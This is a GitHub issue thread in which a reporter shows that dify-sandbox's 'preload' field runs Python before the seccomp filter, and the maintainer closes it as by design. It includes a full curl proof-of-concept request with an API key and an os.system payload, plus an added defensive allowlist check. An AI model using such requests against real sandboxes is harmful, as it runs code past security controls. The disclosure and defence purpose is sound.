Closed ac0d3r closed 3 months ago
Nice, very spirited
Looks like your dify-sandbox environment has broken, seccomp does not work as expected, I have tested your payload
BTW, the preload argument is not free for end users, it is used to implement some extra logic which needs extra permissions, and you cannot access this API without an API-KEY
It looks like you didn't construct the payload correctly. You should put the code in the preload section.
## Dify-Sandbox
curl -X "POST" "http://192.168.64.15:8194/v1/sandbox/run" \
-H 'X-Api-Key: dify-sandbox' \
-H 'Content-Type: application/json; charset=utf-8' \
-d $'{
"preload": "import os;os.system(\\"touch /zznQ.txt\\")",
"language": "python3",
"code": "print(1)"
}'
Thanks for your report, but it's by design, not a vulnerability. The argument preload is designed to implement extra logic.
Issue Description
Simple constructed requests can bypass the seccomp security policy.
Steps to Reproduce
dify-sandbox
Normally this code
import os;os.system("touch /zznQ.txt")
would be blocked:
Then I checked the code and found that Seccomp can be bypassed by the contents of the {{preload}} because this code will be executed before lib.DifySeccomp.
Put this code
import os;os.system("touch /zznQ.txt")
in preload to bypass the security policy:
Enter the container:
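An added example, not part of the original issue and not dify-sandbox's own code: since the thread establishes that preload runs before the seccomp filter by design, the control has to sit with whoever builds the request. This sketch assumes a hypothetical gateway check in front of /v1/sandbox/run; the function name, the allowlist and the sample bodies are all constructed for illustration.

```python
import hashlib
import json

# Hypothetical allowlist: SHA-256 digests of preload snippets the operator has reviewed.
APPROVED_PRELOAD_SHA256 = {
    hashlib.sha256(b"import json").hexdigest(),  # constructed sample entry
}


def check_run_request(raw_body, caller_is_trusted):
    """Return findings for one /v1/sandbox/run request body; an empty list means pass."""
    try:
        body = json.loads(raw_body)
    except ValueError:  # covers JSONDecodeError and UnicodeDecodeError
        return ["body is not valid JSON"]
    if not isinstance(body, dict):
        return ["body is not a JSON object"]

    preload = body.get("preload")
    if preload is None or preload == "":
        return []  # nothing is scheduled to run ahead of the seccomp filter
    if not isinstance(preload, str):
        return ["preload is not a string"]

    # Per the thread, preload executes before the filter is installed, so it
    # must be operator-controlled and never carry end-user input.
    findings = []
    if not caller_is_trusted:
        findings.append("preload supplied by untrusted caller")
    digest = hashlib.sha256(preload.encode("utf-8")).hexdigest()
    if digest not in APPROVED_PRELOAD_SHA256:
        findings.append("preload not in approved allowlist: sha256=" + digest)
    return findings


# Constructed sample bodies, shaped like the request in the report.
REPORTED = json.dumps({"preload": 'import os;os.system("touch /zznQ.txt")',
                       "language": "python3", "code": "print(1)"}).encode()
PLAIN = json.dumps({"language": "python3", "code": "print(1)"}).encode()
APPROVED = json.dumps({"preload": "import json",
                       "language": "python3", "code": "print(1)"}).encode()

if __name__ == "__main__":
    for name, sample in (("reported", REPORTED), ("plain", PLAIN), ("approved", APPROVED)):
        print(name, check_run_request(sample, caller_is_trusted=False))
```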